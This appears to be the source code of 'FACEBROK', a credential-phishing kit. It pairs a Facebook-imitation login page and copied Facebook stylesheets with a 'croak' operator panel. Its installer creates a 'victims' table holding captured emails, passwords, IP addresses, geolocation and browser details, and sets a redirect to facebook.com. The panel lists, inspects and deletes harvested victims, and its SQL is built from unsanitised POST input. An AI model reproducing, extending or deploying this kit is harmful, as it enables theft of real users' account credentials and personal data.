6 | ._3v6c._5dwa{padding:12px 0}._3v6c span._38my{color:#4b4f56;font-size:14px;font-weight:bold;line-height:15px;text-transform:none}._3v6c ._5u7u{color:#90949c;font-size:13px;line-height:16px}._10tt{color:#1d2129;font-size:13px;margin:0 12px}div._5dwa+div._427x{border-top:1px solid #dddfe2;margin-top:0}._427x>div{border:none;margin:0}._1xnd>div{margin-bottom:12px}._1xnd>div._4urp{margin-bottom:0}._2_s5{padding:10px 12px}._2_s5>a{color:#000}._3x9t{margin-top:80px;text-align:center}._1579{height:16px;width:16px}._14-3{color:#42b72a}._14-4{color:#7f7f7f}._14-5{color:#fa3e3e}._4v9s{display:flex}._4v9t{margin-bottom:auto;margin-top:auto}._4v9u{border-style:solid;border-top-color:#dddfe2;border-width:1px 0 0 0}._4cwm{text-decoration:none}._4cwn{color:#000}._4cwo{color:#90949c}._5bpm{height:20px;width:20px}._3r5h{margin-left:auto}._3r5i{color:#4b4f56;font-family:helvetica, arial, sans-serif;font-size:18px;font-weight:bold;margin-left:4px}._38of{text-align:center}._1m_s{color:#1d2129;font-family:helvetica, arial, sans-serif;font-size:14px}._1m_t{color:#4b4f56;font-family:helvetica, arial, sans-serif;font-size:12px;padding:20px 40px}._v0m{overflow:hidden;text-overflow:ellipsis;white-space:nowrap}._5i6{font-size:13px}._3ln4{font-weight:bold}._5po3{border-bottom:1px solid #ccc;color:#999;font-size:14px;margin:12px;padding-bottom:8px}._5ky{color:#999;font-size:14px;padding-left:24px;width:100px}._5k_{font-size:14px;padding-left:16px;padding-right:8px}._5zd{color:#999;font-size:14px;padding-left:24px;width:50px}._5jau{font-size:14px}._5jav{font-weight:bold}._1ca0._42fr{background-color:#fff;border-width:2px;color:#999;padding-left:4px;padding-right:4px;vertical-align:top}
7 | ._3-n5 ._2a_w{display:block}._2a_w{background-color:rgba(0, 0, 0, .4);height:100%;left:0;opacity:0;pointer-events:none;position:absolute;top:0;width:100%}._2a_z{animation-duration:3s;animation-name:animate}._2a_x{background-image:url(/rsrc.php/v3/yJ/r/5G9iOCqWiu4.png);background-repeat:no-repeat;background-size:auto;background-position:0 -146px;height:72px;left:50%;position:absolute;top:50%;transform:translate(-50%, -50%);width:72px}._2a_y{color:#fff;font-size:16px;font-weight:bold;left:50%;margin-top:55px;position:absolute;top:50%;transform:translate(-50%, -50%)}@keyframes animate{0%{opacity:0}16%{opacity:1}83%{opacity:1}100%{opacity:0}}
8 |
9 | #bootloader_IW1Af{height:42px;}.bootloader_IW1Af{display:block!important;}
--------------------------------------------------------------------------------
/croak/install/install.php:
--------------------------------------------------------------------------------
1 | _db = new mysqli($_POST['server'], $_POST['user'], $_POST['pass'], $_POST['data']);
12 | if ( $this->_db->connect_errno )
13 | {
14 | $this->debugMessage("Failed connection to MySQL: ".$this->_db->connect_error);
15 | return;
16 | }
17 | self::Query();
18 | self::MakeConfigFile();
19 | }
20 | public function Query(){
21 | $userp=$_POST['userp'];
22 | $passp=$_POST['passp'];
23 | $this->_db->query("DROP TABLE IF EXISTS `users`");
24 | $this->_db->query("DROP TABLE IF EXISTS `settings`");
25 | $this->_db->query("DROP TABLE IF EXISTS `victims`");
26 | $this->_db->query("CREATE TABLE IF NOT EXISTS `settings` (`options` varchar(50) NOT NULL, `value` varchar(100) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1");
27 | $this->_db->query("CREATE TABLE IF NOT EXISTS `users` (`username` varchar(10) NOT NULL, `password` varchar(10) NOT NULL ) ENGINE=InnoDB DEFAULT CHARSET=latin1");
28 | $this->_db->query("CREATE TABLE IF NOT EXISTS `victims` (`id` int(100) NOT NULL AUTO_INCREMENT, `email` varchar(50) NOT NULL, `password` varchar(50) NOT NULL, `date` date NOT NULL, `ip` varchar(20) NOT NULL, `country` varchar(20) NOT NULL, `city` varchar(20) NOT NULL, `os` varchar(20) NOT NULL, `browser` varchar(10) NOT NULL, `architecture` varchar(5) NOT NULL, `language` varchar(10) NOT NULL, `region` varchar(20) NOT NULL, `provetor` varchar(20) NOT NULL, `agent` varchar(100) NOT NULL, `referer` varchar(100) NOT NULL, `getdate` date NOT NULL, `logitude` varchar(20) NOT NULL, `latitude` varchar(20) NOT NULL, `device` varchar(10) NOT NULL, `continent` varchar(10) NOT NULL, `currency` varchar(10) NOT NULL, `geo` varchar(100) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=27 DEFAULT CHARSET=latin1");
29 | $this->_db->query("INSERT INTO `settings` (`options`, `value`) VALUES ('email_alert', 'example@localhost.com'), ('url_redirect', 'https://www.facebook.com'), ('auto_translationstate', 'true'), ('Geo_location', 'false'), ('language_list', 'en;es;')");
30 | $this->_db->query("INSERT INTO `users` (`username`, `password`) VALUES ('$userp', '$passp')");
31 | $this->_db->query("ALTER TABLE `victims` ADD PRIMARY KEY (`id`)");
32 | $this->_db->query("ALTER TABLE `victims` MODIFY `id` int(100) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=0");
33 | $this->debugMessage("Install succesifully!");
34 | }
35 | public function debugMessage($message){echo "
FACEBROK MESSAGE:".$message." ";}
36 | public function MakeConfigFile(){
37 | $open = fopen("../configuration.php",'w');
38 | fputs($open,"\n");
47 | fclose($open);
48 | unlink('install.php');
49 | unlink('index.php');
50 | rename('temp.php','index.php');
51 | }
52 | }
53 |
54 | $inst = new INSTALL;
55 |
56 |
57 |
58 |
59 |
60 | ?>
61 |
62 |
63 |
FACEBROK install
64 |
65 |
You will be redirected in 10 second(s).
66 |
--------------------------------------------------------------------------------
/dynamic/KmsXu0lfzu7.css:
--------------------------------------------------------------------------------
1 | ._18tn{position:relative}._18tn:hover{text-decoration:none}._18tn:hover ._18to{text-decoration:underline}._18tn ._18to{color:#000;font-size:14px;font-weight:bold;margin-bottom:8px;overflow:hidden;text-overflow:ellipsis;white-space:normal}._3mrx{padding:12px 8px}._18tq{height:148px;width:352px}._18tr{margin-bottom:8px;overflow:hidden;text-overflow:ellipsis;white-space:normal}._18ts{margin-bottom:8px;overflow:hidden;text-overflow:ellipsis;white-space:normal}._18tt{margin:12px 8px 12px 0}._18tu{color:#000;height:148px;overflow:hidden;text-overflow:ellipsis;word-wrap:break-word}
2 | ._4dlt{display:inline-block;margin-right:10px}._3rku{display:inline-block}._5yat{font-size:14px;min-width:15em}._57nb{width:95%;word-break:normal}._2m80{color:#4b4f56;font-family:Helvetica;font-size:14px;line-height:20px;text-align:center;vertical-align:middle}._4d2j{margin-bottom:-3px;margin-top:-3px}._362g{overflow:auto;padding:8px}._362c{position:relative;-moz-user-select:none}._362d{bottom:50%;margin:auto;position:absolute;top:50%}._362e{font-size:12px;left:27px;position:relative;top:-8px}._362f{font-weight:normal;left:0;overflow:hidden;position:absolute;text-overflow:ellipsis;top:8px;white-space:nowrap;width:350px}._4d2i{float:right;padding-bottom:2px;padding-top:8px}._2pv5{text-align:center}._21oi{font-size:12px;padding-left:1px;padding-top:8px}._4vua{font-size:14px;margin-bottom:-10px;padding-left:130px;padding-top:10px}._2md-{padding:20px;width:440px}._2md_{display:block;position:relative}._2md_::before{box-shadow:inset 46px 0 44px -2px #eee;content:"";height:100%;left:0;position:absolute;top:0;width:100%;z-index:1000}._2md_ img{position:relative}div._2me0{background-color:#fff}._2me0:hover{background-color:#f6f7f9}._io9{padding-right:5px}._2me1 .ccta-fade-card-enter{max-height:0;transition:max-height .5s ease-in}._2me1 .ccta-fade-card-enter.ccta-fade-card-enter-active{max-height:600px}._2me1 .ccta-fade-card-leave{max-height:400px;transition:max-height .5s ease-out}._2me1 .ccta-fade-card-leave.ccta-fade-card-leave-active{max-height:0}._2mdy{background:#e9ebee;overflow:hidden}._2mdz{height:280px}.__l{height:280px}._xgc{margin-right:5px}
3 | ._2-sm._xa8{font-size:12px}._2-sm._xa9{font-size:14px}._2-sm._xaf{font-size:16px}._2-sm._4t_j{font-family:HelveticaNeue-Medium;font-weight:normal;height:28px;padding:0}._2-sm._4t_j ._5y2k,._2-sm._4t_j ._5y2j{line-height:100%;vertical-align:middle}._2-sm{border:0;border-radius:2px;color:#fff;cursor:pointer;font-weight:bold;padding:.8em 1.5em;text-align:center;transition:transform 100ms cubic-bezier(0,.7,.5,1)}button._2-sm._xak{width:100%}a._2-sm._xak{display:block}._2-sm:active{transform:scale(.97)}._2-sm._xaj:active{transform:scale(1)}._2-sm:focus,._2-sm:hover,._2-sm:active{text-decoration:none}._2-sm:focus{outline:0}._xag{background-color:#4080ff}._xag:focus,._xag:hover{background-color:#3d6ad6}._xah{background-color:#4267b2}._xah:focus,._xah:hover{background-color:#29487d}._xai{background:#42b72a}._xai:focus,._xai:hover{background-color:#5c3}._xaj{background:#e5e5e5;color:#ccc;cursor:default;transform:none}._xa7._xal+._xa7._xal{margin-left:.75em}button._xak+button._xak,a._xak+a._xak{margin-left:0;margin-top:1em}
4 | ._jlu{overflow:hidden}._jlw{background:white;border:1px solid;border-bottom-left-radius:3px;border-bottom-right-radius:3px;border-color:#e5e6e9 #dfe0e4 #d0d1d5;border-top:0 none;clear:both;float:left;height:200px;margin:0;padding:0;position:relative;width:844px}._jlx,._2fuu{height:20px;line-height:20px;margin-top:1px}._jlx div{display:table-cell;height:20px;vertical-align:middle}._20qx{padding:0 8px}._5bhr{margin:10px 0 10px;width:844px}._5bhs{padding:10px;text-align:center}._5bhr ._5k72{padding:0 8px 8px}._3z8d{color:#90949c;font-weight:bold;line-height:22px;margin-left:15px;vertical-align:middle}._jly{margin-top:2px}._jlz{background:rgba(0, 0, 0, .3);border-radius:3px;bottom:15px;box-shadow:0 1px 1px rgba(0, 0, 0, .07);left:15px;padding:1px;position:absolute}._jlz ._2s61{left:auto;position:relative;right:auto;top:124px}._jlz ._2s62{bottom:0;left:0;position:absolute;right:0;text-align:center;top:0}._jl-{background:#4b4f56;height:156px}._jl_{color:#90949c;height:20px;padding:12px 15px 12px 197px}._jm0{bottom:44px;left:197px;position:absolute;width:644px}._3ad8{color:#fff;float:left;padding:0 0 4px 0;text-shadow:0 1px 4px rgba(0, 0, 0, .8);width:332px}._486j a{color:#ccc;font-weight:bold}._591g{bottom:12px;position:absolute;right:12px}._4o8j{float:right}._2hqv{float:right;margin-top:-32px}._jlw ._rub{margin-bottom:0}
5 | ._3smn{cursor:pointer;position:absolute;right:4px;top:0}._3smo{position:relative}._3smp{border-style:solid;border-width:1px;box-sizing:border-box;cursor:pointer;font-family:helvetica, arial, sans-serif;font-size:12px;font-weight:500;height:24px;padding:0 0 0 3px;width:102px}
6 | ._5c6a{cursor:default}._5c6g{border-bottom:1px solid #d3d6db;padding:2px}._5c69{text-align:center;width:32px}._5c6h{padding:4px 2px 0 4px}._5hpv{padding-bottom:4px}._5c66{float:left}._5c68,._5hq1{border:1px solid transparent;color:#90949c;cursor:default;float:left;height:22px;line-height:22px;text-align:center;-moz-user-select:none;vertical-align:middle;width:30px}._5hq1:hover,._5hq1:focus{text-decoration:none}._5hpx ._5hq1{color:#000}._5hpw ._5hpx ._5hq1{cursor:pointer}._5hpw ._5hpx ._5hq1:hover,._5hpw ._5hpx ._5hq1:focus{background-color:#4267b2;border-color:#29487d;border-radius:3px;color:#fff;font-weight:bold}._5hpy{background-color:#e9ebee}._5hpz{border-radius:3px 0 0 3px}._5hp-{border-radius:0 3px 3px 0}._5hp_{border-radius:3px}._5hq0 ._5hq1{background-color:#dddfe2;border-radius:3px}._5hpx ._5hq2{background-color:#c4d2e7;border-color:#c4d2e7;border-radius:3px;font-weight:bold}._5hq1._5xur{border:1px solid #fa3e3e;border-radius:3px}
7 | ._5hpp{cursor:default;width:232px}._5hpq{background:url(/rsrc.php/v3/yz/r/HXxRVo7sWOx.png) #f6f7f9 repeat-x;border-bottom:1px solid #d9d9d9;height:32px;position:relative}._5hpr{line-height:32px;text-align:center}._5hps{background:transparent;border:none;cursor:pointer;line-height:0;margin:0;padding:8px 12px;position:absolute;top:1px}._5hpt{left:1px}._5hpu{right:1px}
8 | ._5c6j{display:inline-block;position:relative}._5c6j ._3smp{border-color:#dddfe2;color:#4267b2;font-family:helvetica, arial, sans-serif}._5c6j ._3smn{top:5px}._5c6i{box-shadow:0 2px 8px 0 rgba(0, 0, 0, .3)}
9 | ._5vu1{margin-left:4px}
10 | ._5ss7{position:relative}._5ss8{margin-bottom:40px;max-width:100%;position:absolute}
11 | ._5xp9{height:96px;position:relative}._5xp9 ._5xpe{display:block;left:50%;margin-left:-12px;margin-top:-12px;position:absolute;top:50%}
12 | ._--l{padding:20px;position:relative;text-align:center}._--n{display:block;margin:20px auto}._--o{color:#90949c;font-size:11px;font-weight:bold;margin-bottom:32px}
13 |
14 | #bootloader_Lcrdl{height:42px;}.bootloader_Lcrdl{display:block!important;}
--------------------------------------------------------------------------------
/dynamic/mia/KmsXu0lfzu7.css:
--------------------------------------------------------------------------------
1 | ._18tn{position:relative}._18tn:hover{text-decoration:none}._18tn:hover ._18to{text-decoration:underline}._18tn ._18to{color:#000;font-size:14px;font-weight:bold;margin-bottom:8px;overflow:hidden;text-overflow:ellipsis;white-space:normal}._3mrx{padding:12px 8px}._18tq{height:148px;width:352px}._18tr{margin-bottom:8px;overflow:hidden;text-overflow:ellipsis;white-space:normal}._18ts{margin-bottom:8px;overflow:hidden;text-overflow:ellipsis;white-space:normal}._18tt{margin:12px 8px 12px 0}._18tu{color:#000;height:148px;overflow:hidden;text-overflow:ellipsis;word-wrap:break-word}
2 | ._4dlt{display:inline-block;margin-right:10px}._3rku{display:inline-block}._5yat{font-size:14px;min-width:15em}._57nb{width:95%;word-break:normal}._2m80{color:#4b4f56;font-family:Helvetica;font-size:14px;line-height:20px;text-align:center;vertical-align:middle}._4d2j{margin-bottom:-3px;margin-top:-3px}._362g{overflow:auto;padding:8px}._362c{position:relative;-moz-user-select:none}._362d{bottom:50%;margin:auto;position:absolute;top:50%}._362e{font-size:12px;left:27px;position:relative;top:-8px}._362f{font-weight:normal;left:0;overflow:hidden;position:absolute;text-overflow:ellipsis;top:8px;white-space:nowrap;width:350px}._4d2i{float:right;padding-bottom:2px;padding-top:8px}._2pv5{text-align:center}._21oi{font-size:12px;padding-left:1px;padding-top:8px}._4vua{font-size:14px;margin-bottom:-10px;padding-left:130px;padding-top:10px}._2md-{padding:20px;width:440px}._2md_{display:block;position:relative}._2md_::before{box-shadow:inset 46px 0 44px -2px #eee;content:"";height:100%;left:0;position:absolute;top:0;width:100%;z-index:1000}._2md_ img{position:relative}div._2me0{background-color:#fff}._2me0:hover{background-color:#f6f7f9}._io9{padding-right:5px}._2me1 .ccta-fade-card-enter{max-height:0;transition:max-height .5s ease-in}._2me1 .ccta-fade-card-enter.ccta-fade-card-enter-active{max-height:600px}._2me1 .ccta-fade-card-leave{max-height:400px;transition:max-height .5s ease-out}._2me1 .ccta-fade-card-leave.ccta-fade-card-leave-active{max-height:0}._2mdy{background:#e9ebee;overflow:hidden}._2mdz{height:280px}.__l{height:280px}._xgc{margin-right:5px}
3 | ._2-sm._xa8{font-size:12px}._2-sm._xa9{font-size:14px}._2-sm._xaf{font-size:16px}._2-sm._4t_j{font-family:HelveticaNeue-Medium;font-weight:normal;height:28px;padding:0}._2-sm._4t_j ._5y2k,._2-sm._4t_j ._5y2j{line-height:100%;vertical-align:middle}._2-sm{border:0;border-radius:2px;color:#fff;cursor:pointer;font-weight:bold;padding:.8em 1.5em;text-align:center;transition:transform 100ms cubic-bezier(0,.7,.5,1)}button._2-sm._xak{width:100%}a._2-sm._xak{display:block}._2-sm:active{transform:scale(.97)}._2-sm._xaj:active{transform:scale(1)}._2-sm:focus,._2-sm:hover,._2-sm:active{text-decoration:none}._2-sm:focus{outline:0}._xag{background-color:#4080ff}._xag:focus,._xag:hover{background-color:#3d6ad6}._xah{background-color:#4267b2}._xah:focus,._xah:hover{background-color:#29487d}._xai{background:#42b72a}._xai:focus,._xai:hover{background-color:#5c3}._xaj{background:#e5e5e5;color:#ccc;cursor:default;transform:none}._xa7._xal+._xa7._xal{margin-left:.75em}button._xak+button._xak,a._xak+a._xak{margin-left:0;margin-top:1em}
4 | ._jlu{overflow:hidden}._jlw{background:white;border:1px solid;border-bottom-left-radius:3px;border-bottom-right-radius:3px;border-color:#e5e6e9 #dfe0e4 #d0d1d5;border-top:0 none;clear:both;float:left;height:200px;margin:0;padding:0;position:relative;width:844px}._jlx,._2fuu{height:20px;line-height:20px;margin-top:1px}._jlx div{display:table-cell;height:20px;vertical-align:middle}._20qx{padding:0 8px}._5bhr{margin:10px 0 10px;width:844px}._5bhs{padding:10px;text-align:center}._5bhr ._5k72{padding:0 8px 8px}._3z8d{color:#90949c;font-weight:bold;line-height:22px;margin-left:15px;vertical-align:middle}._jly{margin-top:2px}._jlz{background:rgba(0, 0, 0, .3);border-radius:3px;bottom:15px;box-shadow:0 1px 1px rgba(0, 0, 0, .07);left:15px;padding:1px;position:absolute}._jlz ._2s61{left:auto;position:relative;right:auto;top:124px}._jlz ._2s62{bottom:0;left:0;position:absolute;right:0;text-align:center;top:0}._jl-{background:#4b4f56;height:156px}._jl_{color:#90949c;height:20px;padding:12px 15px 12px 197px}._jm0{bottom:44px;left:197px;position:absolute;width:644px}._3ad8{color:#fff;float:left;padding:0 0 4px 0;text-shadow:0 1px 4px rgba(0, 0, 0, .8);width:332px}._486j a{color:#ccc;font-weight:bold}._591g{bottom:12px;position:absolute;right:12px}._4o8j{float:right}._2hqv{float:right;margin-top:-32px}._jlw ._rub{margin-bottom:0}
5 | ._3smn{cursor:pointer;position:absolute;right:4px;top:0}._3smo{position:relative}._3smp{border-style:solid;border-width:1px;box-sizing:border-box;cursor:pointer;font-family:helvetica, arial, sans-serif;font-size:12px;font-weight:500;height:24px;padding:0 0 0 3px;width:102px}
6 | ._5c6a{cursor:default}._5c6g{border-bottom:1px solid #d3d6db;padding:2px}._5c69{text-align:center;width:32px}._5c6h{padding:4px 2px 0 4px}._5hpv{padding-bottom:4px}._5c66{float:left}._5c68,._5hq1{border:1px solid transparent;color:#90949c;cursor:default;float:left;height:22px;line-height:22px;text-align:center;-moz-user-select:none;vertical-align:middle;width:30px}._5hq1:hover,._5hq1:focus{text-decoration:none}._5hpx ._5hq1{color:#000}._5hpw ._5hpx ._5hq1{cursor:pointer}._5hpw ._5hpx ._5hq1:hover,._5hpw ._5hpx ._5hq1:focus{background-color:#4267b2;border-color:#29487d;border-radius:3px;color:#fff;font-weight:bold}._5hpy{background-color:#e9ebee}._5hpz{border-radius:3px 0 0 3px}._5hp-{border-radius:0 3px 3px 0}._5hp_{border-radius:3px}._5hq0 ._5hq1{background-color:#dddfe2;border-radius:3px}._5hpx ._5hq2{background-color:#c4d2e7;border-color:#c4d2e7;border-radius:3px;font-weight:bold}._5hq1._5xur{border:1px solid #fa3e3e;border-radius:3px}
7 | ._5hpp{cursor:default;width:232px}._5hpq{background:url(/rsrc.php/v3/yz/r/HXxRVo7sWOx.png) #f6f7f9 repeat-x;border-bottom:1px solid #d9d9d9;height:32px;position:relative}._5hpr{line-height:32px;text-align:center}._5hps{background:transparent;border:none;cursor:pointer;line-height:0;margin:0;padding:8px 12px;position:absolute;top:1px}._5hpt{left:1px}._5hpu{right:1px}
8 | ._5c6j{display:inline-block;position:relative}._5c6j ._3smp{border-color:#dddfe2;color:#4267b2;font-family:helvetica, arial, sans-serif}._5c6j ._3smn{top:5px}._5c6i{box-shadow:0 2px 8px 0 rgba(0, 0, 0, .3)}
9 | ._5vu1{margin-left:4px}
10 | ._5ss7{position:relative}._5ss8{margin-bottom:40px;max-width:100%;position:absolute}
11 | ._5xp9{height:96px;position:relative}._5xp9 ._5xpe{display:block;left:50%;margin-left:-12px;margin-top:-12px;position:absolute;top:50%}
12 | ._--l{padding:20px;position:relative;text-align:center}._--n{display:block;margin:20px auto}._--o{color:#90949c;font-size:11px;font-weight:bold;margin-bottom:32px}
13 |
14 | #bootloader_Lcrdl{height:42px;}.bootloader_Lcrdl{display:block!important;}
--------------------------------------------------------------------------------
/croak/index.php:
--------------------------------------------------------------------------------
1 | error_disable();
7 | if(!$facebrok->check_session()){
8 | if($_GET['action']=="login"){
9 | $facebrok->checkuser($_POST['userp'],$_POST['passp']);
10 | }
11 | ?>
12 |
13 |
14 |
FACEBROK Log in
15 |
28 |
29 | logout();}
34 | if($_GET['action']=="delete_victim"){$MSG=$facebrok->delete_victim($_GET['id']);}
35 | if($_GET['action']=="extra_victim") {$MSG=$facebrok->get_info_victim($_GET['id']);}
36 | ?>
37 |
38 |
39 |
40 |
41 |
42 |
FACEBROK Panel
43 |
44 |
45 |
46 |
47 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
LOSG
100 |
101 |
102 |
103 |
104 |
105 |
106 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
135 |
136 |
137 |
138 |
--------------------------------------------------------------------------------
/includes/top.php:
--------------------------------------------------------------------------------
1 |
2 |
Facebook - Log In or Sign Up
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/dynamic/mia/PVVRN2Jn6BA.css:
--------------------------------------------------------------------------------
1 | ._3fv0{visibility:hidden}._3fv1{visibility:visible}
2 | .pluginButtonSpacer{padding-left:4px}.pluginButton{background:#4c69ba;background:linear-gradient(#4c69ba, #3b55a0);border:none;border-radius:2px;color:#fff;cursor:pointer;font-weight:bold;height:20px;line-height:20px;padding:0;text-shadow:0 -1px 0 #354c8c;white-space:nowrap}.pluginButtonLight{background:linear-gradient(#0084ff, #006fff);text-shadow:0 -1px 0 #005ecf}.pluginButtonInline{display:inline-block}.pluginButtonX{cursor:default}.pluginButton button{background:transparent;border:0;color:inherit;cursor:pointer;font:inherit;font-weight:bold;margin:0;outline:none;padding:0;text-shadow:0 -1px 0 #354c8c}.pluginButton button::-moz-focus-inner{border:0;padding:0}.gecko .pluginButton button:focus{outline:1px dotted}.pluginButtonIcon{height:14px;left:0;margin:0 4px 0 4px;position:relative;top:3px;vertical-align:top;width:14px}.pluginButtonImage{display:inline-block}.pluginButtonIconSVG{height:14px;width:14px}.no_svg .pluginButtonIconSVG,.svg .pluginButtonIconPNG{display:none}.pluginButtonIconPlaceholder{display:block;height:14px;width:7px}.pluginButton .pluginButtonLabel{padding:0 5px 0 0;position:relative;vertical-align:top}.gecko .pluginButton .pluginButtonLabel,.android .pluginButton .pluginButtonLabel{top:1px}.pluginButton:hover{background:#5b7bd5;background:linear-gradient(#5b7bd5, #4864b1);border-color:#5874c3 #4961a8 #41599f;box-shadow:inset 0 0 1px #607fd6}.pluginButtonLight:hover{background:linear-gradient(#009bff, #0084ff);box-shadow:inset 0 0 1px #006fff}.pluginButtonPressed,.pluginButtonPressed:hover{background:#29487d;background:linear-gradient(#415ca9, #4c69ba);border-color:#365899 #ddd #374f92;box-shadow:inset 0 0 1px #3e58a3;opacity:.7}.pluginButtonPressedLight,.pluginButtonPressedLight:hover{background:linear-gradient(#006fff, #0084ff)}.pluginButtonErrorLink{color:#a00;font-weight:bold}.pluginButtonX .pluginButtonXOff,.pluginButtonX button:hover .pluginButtonXOn,.pluginButtonX button:focus .pluginButtonXOn{display:inline-block}.pluginButtonX .pluginButtonXOn,.pluginButtonX button:hover .pluginButtonXOff,.pluginButtonX button:focus .pluginButtonXOff{display:none}.pluginButton .pluginButtonThrobber,form.async_saving .pluginButtonIconWithThrobber{display:none}form.async_saving .pluginButtonThrobber{display:inline-block;margin-top:2px;margin-bottom:1px;max-width:14px}
3 | .pluginCountBox{background:#fff;border:1px solid #90949c;border-radius:2px;color:#4b4f56;font-size:13px;height:24px;margin:0;min-width:35px;padding:6px 1px 2px 3px;text-align:center;white-space:nowrap}.pluginCountBoxIcon{left:-3px;position:relative;top:2px}.pluginCountBoxTextOnly{padding:2px}.pluginCountBoxNub{bottom:1px;height:7px;left:7px;position:relative;width:0;z-index:2}.pluginCountBoxNub s,.pluginCountBoxNub i{border-color:#90949c transparent transparent;border-right:5px solid transparent;border-style:solid;border-width:5px;display:block;position:relative}.pluginCountBoxNub i{border-top-color:#fff;left:0;top:-12px}
4 | .pluginCountButton{background:white;border:1px solid #90949c;border-radius:2px;color:#4b4f56;display:inline-block;font-size:11px;height:auto;line-height:18px;margin-left:6px;min-width:15px;padding:0 3px;text-align:center;white-space:nowrap}.pluginCountButtonNub{height:0;left:2px;position:relative;top:-15px;width:5px;z-index:2}.pluginCountButtonNub s,.pluginCountButtonNub i{border-color:transparent #90949c;border-style:solid;border-width:4px 5px 4px 0;display:block;position:relative;top:1px}.pluginCountButtonNub i{border-right-color:#fff;left:2px;top:-7px}
5 | .pluginCountTextConnected,.pluginCountConnected .pluginCountTextDisconnected{display:none}.pluginCountConnected .pluginCountTextConnected{display:inline}
6 | ._l0a,._l0d{width:100%}
7 | ._2tga{background:#4267b2;border:1px solid #4267b2;color:#fff;cursor:pointer;font-family:Helvetica, Arial, sans-serif;margin:0;-moz-user-select:none;white-space:nowrap}._2tga::-moz-focus-inner{border:0;padding:0}._2tga.active{background:#4080ff;border:1px solid #4080ff}._2tga._4kae.active,._2tga._4kae.active:hover{background:#577fbc;border:1px solid #577fbc}._2tga._49ve{border-radius:3px;font-size:11px;height:20px;padding:0 0 0 2px}._2tga._3e2a{border-radius:4px;font-size:13px;height:28px;padding:0 4px 0 6px}._2tga._5n6f{border-top-left-radius:0;border-top-right-radius:0}._2tga:hover{background:#365899;border:1px solid #365899}._2tga:active{background:#577fbc;border:1px solid #577fbc}._2tga:focus{outline-color:transparent;outline-style:none}._2tga.active:hover{background:#4080ff;border:1px solid #4080ff}._11qm{background:#fff;border:1px solid #ced0d4;color:#4267b2}._11qm:hover{background:#f6f7f9;border:1px solid #ced0d4}._11qm.active{border:1px solid #4080ff;color:#fff}._3oi2{background:#0084ff;border:1px solid #0084ff;color:#fff}._3oi2:hover{background:#0077e5;border:1px solid #0077e5}._3e2a ._3jn-{position:relative;top:-1px}._3jn-{height:16px;vertical-align:middle;width:16px}._3jn_{background:none;display:none;height:28px;left:-6px;position:absolute;top:-6px;width:28px}@keyframes burst{from{background-position:0 0}to{background-position:-616px 0}}._2tga.is_animating ._3jn_{animation:burst .24s steps(22) forwards;background:url(/rsrc.php/v3/yO/r/PUJSGDyTmu1.png) no-repeat;background-position:0 0;background-size:616px 28px;display:inline-block;zoom:1}._49ve._2tga.is_animating ._3jn_{left:-6px;position:relative;top:-6px}._49vg,._5n2y{vertical-align:middle}._2tga ._4kaf,._2tga ._5n2y,._2tga.active ._49vg,._2tga.active.is_animating ._5n2y,._2tga.active.is_animating.stop_hoverx ._4kaf,._2tga.active.stop_hoverx:hover ._4kag,._2tga.active:hover ._5n2y._4kaf{display:none}._2tga ._49vg,._2tga.active ._5n2y,._2tga.active.stop_hoverx:hover ._5n2y,._2tga.active:hover ._4kag{display:inline-block;zoom:1}#facebook ._2tga span._49vh,#facebook ._2tga span._5n6h,._49vh,._5n6h{font-family:Helvetica, Arial, sans-serif;vertical-align:middle}.gecko ._49ve ._49vh,.gecko ._49ve ._5n6h{position:relative;top:1px}._49vh{font-weight:bold}._5n6h{font-weight:normal}._5n6j{border-radius:3px;height:20px;line-height:20px}._5n6k{border-radius:4px;height:30px;line-height:30px}._5n6l{background:#fff;border:1px solid #90949c;border-bottom:none;border-bottom-left-radius:0;border-bottom-right-radius:0;box-sizing:border-box;color:#1d2129;text-align:center;width:100%}._2tga ._1pbq{height:16px;width:16px}.no_svg ._2tga ._1pbq,.svg ._2tga ._1pbs{display:none}._2n-v ._49vh{padding-left:2px}
8 | .sp_17LjRCoh-SV{background-image:url(/rsrc.php/v3/y0/r/wPbw_sLj8e_.png);background-size:auto;background-repeat:no-repeat;display:inline-block;height:16px;width:16px}.sp_17LjRCoh-SV.sx_c4ce9d{background-position:0 0}.sp_17LjRCoh-SV.sx_12a99c{background-position:0 -17px}.sp_17LjRCoh-SV.sx_8c94c5{background-position:0 -34px}.sp_17LjRCoh-SV.sx_23db42{background-position:0 -51px}
9 | .sp_dZ8EoGWIx5x{background-image:url(/rsrc.php/v3/y7/r/95dK0JvdDAj.png);background-size:auto;background-repeat:no-repeat;display:inline-block;height:14px;width:14px}.sp_dZ8EoGWIx5x.sx_be1dfd{background-position:0 0}.sp_dZ8EoGWIx5x.sx_991f65{background-position:0 -15px}.sp_dZ8EoGWIx5x.sx_b9fed2{background-position:0 -30px}.sp_dZ8EoGWIx5x.sx_81ffc8{width:13px;height:13px;background-position:0 -45px}
10 |
11 | #bootloader_Fo912{height:42px;}.bootloader_Fo912{display:block!important;}
--------------------------------------------------------------------------------
/croak/css/style.css:
--------------------------------------------------------------------------------
1 | * { padding:0; margin:0; outline:0; }
2 | body {
3 | background:#ffffff;
4 | font-family: Verdana, sans-serif;
5 | font-size:11px;
6 | line-height:14px;
7 | color:#5e5e5e;
8 | }
9 | input, textarea, select { font-family: Verdana, sans-serif; font-size:13px; }
10 | textarea { overflow:hidden; }
11 |
12 | .field { border:solid 1px #d3cfc7; background:#fff; padding:5px; }
13 | .small-field { border:solid 1px #d3cfc7; background:#fff; padding:3px 1px; font-size:11px; }
14 |
15 | .checkbox { width:13px; height:13px; vertical-align:top; position:relative; top:2px; }
16 |
17 | .button { background:#eee url(images/button.gif) repeat-x 0 0; border:solid 1px #b1a874; color:#7f7f7f; font-size:11px; padding:2px 6px 2px 6px; cursor:pointer; line-height:14px !important; }
18 | .button:hover { color:#333; border-color:#857b42; }
19 |
20 |
21 | .field:focus { color:#000; border-color:#857b42;}
22 |
23 | a img { border:0; }
24 |
25 | a { color:black; text-decoration: underline; cursor:pointer; }
